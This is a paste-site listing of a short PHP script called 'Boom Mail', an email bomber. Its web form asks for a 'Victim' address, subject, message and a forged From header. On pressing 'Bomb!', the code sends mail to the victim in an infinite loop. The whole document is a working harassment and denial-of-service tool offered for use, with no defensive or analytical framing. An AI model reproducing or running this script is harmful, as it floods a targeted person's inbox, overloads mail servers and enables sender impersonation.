Boom Mail - JUW - Joker-Tools.Com - JokerDarkKnight.Com - JokerDarkKnight.Info


SUBMITTED BY: Guest

DATE: Nov. 21, 2014, 6:07 a.m.

FORMAT: PHP

SIZE: 822 Bytes

HITS: 1211

  1. <?php
  2. $vic = htmlentities($_POST['vic']);
  3. $subject = htmlentities($_POST['subj']);
  4. $message = htmlentities($_POST['mes']);
  5. $from = htmlentities($_POST['from']);
  6. $sub = $_POST['sub'];
  7. $all = "$vic$subject$message$from";
  8. $i = 1;
  9. if(!empty($all) && isset($sub)){
  10. do {
  11. mail($vic, $subject, $message, "From: ".$from);
  12. } while ($i > 0);
  13. } else if (empty($all) && isset($sub)){
  14. echo 'Please enter all fields!';
  15. }
  16. ?>
  17. <form action="#" method="POST">
  18. Victim: <input type="text" name="vic"><br>
  19. Subject: <input type="text" name="subj"><br>
  20. Message: <input type="text" name="mes"><br>
  21. From: <input type="text" name="from"><br>
  22. <input type="submit" name="sub" value="Bomb!">
  23. </form>

comments powered by Disqus